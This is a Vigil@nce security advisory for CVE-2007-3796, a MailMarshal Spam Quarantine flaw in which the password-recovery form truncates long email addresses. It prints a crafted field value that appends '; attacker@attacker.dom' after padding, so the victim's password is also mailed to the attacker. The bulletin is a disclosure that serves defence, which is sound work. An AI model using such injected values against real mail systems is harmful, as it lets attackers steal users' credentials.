vulnerability announce CVE-2007-3796

MailMarshal: password retrieval

Synthesis of the vulnerability

An attacker can use a special query in order to force MailMarshal to send password of Spam Quarantine interface.
Impacted products: MailMarshal.
Severity: 2/4.
Creation date: 17/07/2007.
Identifiers: CVE-2007-3796, VIGILANCE-VUL-7012.

Description of the vulnerability

To access the web interface of MailMarshal Spam Quarantine, a login (an email address) and its password are required. If user loose his password, the /SpamConsole/Register.aspx form can send it back.

This form sends information to the indicated email address. However, if this address is long, it is truncated. For example, if attacker enters the following address:
  victim@victim.dom _spaces_ ; attacker@attacker.dom
the database only compares (to ensure it is in the database):
  victim@victim.dom
but the script sends the mail to:
  victim@victim.dom ; attacker@attacker.dom
Attacker thus also receives the email containing the password.

An attacker knowing user's email address can therefore obtain his password.
Complete Vigil@nce bulletin.... (free access)

Share this bulletin

          

Computer vulnerabilities tracking service

Vigil@nce provides a system vulnerability bulletin. The Vigil@nce computer vulnerability tracking service alerts your teams of vulnerabilities or threats impacting your information system. The technology watch team tracks security threats targeting the computer system. Each administrator can customize the list of products for which he wants to receive vulnerability alerts.